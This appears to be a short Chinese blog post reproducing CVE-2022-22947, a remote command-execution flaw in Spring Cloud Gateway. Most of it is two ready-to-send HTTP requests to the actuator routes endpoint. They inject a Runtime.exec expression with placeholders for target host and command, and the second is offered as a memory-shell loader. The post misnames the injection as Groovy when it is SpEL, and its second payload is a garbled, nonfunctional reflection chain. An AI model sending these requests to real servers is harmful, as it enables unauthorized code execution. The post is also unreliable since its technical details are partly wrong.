springboot gateway命令执行漏洞复现(CVE-2022-22947)+内存马
该问题涉及到Spring Cloud Gateway中的一个命令执行漏洞(CVE-2022-22947),该漏洞允许未授权攻击者通过发送特制的HTTP请求在目标服务器上执行任意命令。
复现该漏洞的步骤如下:
- 确保你有一个Spring Boot应用程序正在使用Spring Cloud Gateway。
- 使用漏洞利用工具或者手动发送一个HTTP请求,利用Groovy模板表达式注入执行任意命令。
例如,使用如下的HTTP请求可以尝试触发漏洞:
POST /actuator/gateway/routes/hackhttp://command_exec_endpoint HTTP/1.1
Host: your-gateway-host
Accept: */*
Content-Length: length
Content-Type: application/json
{
"id": "hack",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "${T(java.lang.Runtime).getRuntime().exec('your-command')}"
}
}],
"uri": "http://command_exec_endpoint",
"order": 0
}
替换your-gateway-host
为你的网关服务器地址,your-command
为你想执行的命令。
针对内存马的需求,你可以在Groovy表达式中使用Base64编码的payload来执行。
POST /actuator/gateway/routes/hack HTTP/1.1
Host: your-gateway-host
Accept: */*
Content-Length: length
Content-Type: application/json
{
"id": "hack",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "${T(java.lang.Runtime).getRuntime().exec(T(java.lang.String).forName(T(java.lang.ClassLoader).getSystemClassLoader().loadClass('java.lang.Runtime').getDeclaredMethod('getDeclaredMethod', T(java.lang.Class).forName('[Ljava.lang.Class;')).invoke(null, T(java.lang.Class).forName('[Ljava.lang.Class;').cast([T(java.io.Serializable).class])).getDeclaredMethod('getSystemClassLoader').invoke(null), 'getResourceAsStream', T(java.lang.Class).forName('java.lang.Class')).getResourceAsStream('your-payload-resource').text)}"
}
}],
"uri": "http://command_exec_endpoint",
"order": 0
}
替换your-payload-resource
为你的内存马资源路径。
请注意,实际操作时应确保你有权限执行命令和修改路由配置,且应遵守相关法律法规和道德标准,不得用于非法活动。
评论已关闭